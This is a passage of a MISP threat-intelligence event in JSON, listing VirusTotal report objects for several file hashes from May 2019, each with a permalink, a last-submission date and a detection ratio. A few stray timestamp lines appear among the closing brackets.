"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1558002047" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "2b1914f7-d429-496f-b76b-dd9ea4ae34f2" ,
"value" : "https://www.virustotal.com/file/56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936/analysis/1557715050/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1558002047" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "c092edd1-d209-4fc1-8b59-cc68ea535499" ,
"value" : "0/58"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1558013351" ,
"uuid" : "76f9b382-c58e-46f8-b174-42275f764d3e" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1558002045" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "15b0df6f-7808-4a07-a743-33883c247a54" ,
"value" : "2019-05-13T02:37:43"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1558002045" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "15db416c-93ca-4af3-bc7e-aa8af7ad332e" ,
"value" : "https://www.virustotal.com/file/28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02/analysis/1557715063/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1558002045" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "0c2fc5a0-15f4-432a-90c6-c3a49b54266e" ,
"value" : "2/59"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1558013352" ,
"uuid" : "c22ccebe-e72f-4b92-9c63-a196b4959c43" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1558002049" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "829ba8b8-a820-487f-9199-96b13a032e7b" ,
"value" : "2019-05-15T17:45:13"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1558002049" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "77e038db-79c1-487f-8193-f857970cfd08" ,
"value" : "https://www.virustotal.com/file/0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132/analysis/1557942313/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1558002049" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "17e94734-ed26-449a-b1fe-768b881c6f83" ,
"value" : "1/54"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1558013352" ,
"uuid" : "c3b36005-d35f-4540-bf78-cd09e2ac5e3d" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1558011890" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "823fdaca-bb79-49fd-b865-e3e9d8dd86e3" ,
"value" : "2019-05-16T09:42:04"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1558011890" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "3f1e2085-c793-4bb9-8022-5d037641c73e" ,
"value" : "https://www.virustotal.com/file/9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58/analysis/1557999724/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1558011890" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "2c1f9f4d-f9bb-442e-84f8-0f06c1b28d5f" ,
"value" : "10/61"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1558013352" ,
"uuid" : "f5647ba0-86e7-40fa-92a2-7d0fe024a7c2" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1558002050" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "e2e51a40-0e8a-41df-a238-3176befa0d6d" ,
"value" : "2019-05-15T20:41:35"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1558002050" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "2e637413-a76f-4b89-a5f1-1fb99c942c20" ,
"value" : "https://www.virustotal.com/file/c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2/analysis/1557952895/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1558002050" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "a84ca298-e8e4-4048-becf-05c209cfaa19" ,
"value" : "1/60"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1558013352" ,
"uuid" : "9156df9c-4067-422e-bd38-8c3908e8ea5f" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1558002048" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "f1406b9a-3d0d-4419-96dc-6400f3a9bbb1" ,
"value" : "2019-05-13T02:37:29"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1558002048" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "69ee832e-72d0-4b4b-a11c-f57e0452a076" ,
"value" : "https://www.virustotal.com/file/ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73/analysis/1557715049/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1558002048" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "7d4b7e4e-98b2-4840-92ea-7f22911f5603" ,
"value" : "0/58"
}
]
}
2023-04-21 13:25:09 +00:00
]
2023-12-14 14:30:15 +00:00
}
2023-04-21 13:25:09 +00:00
}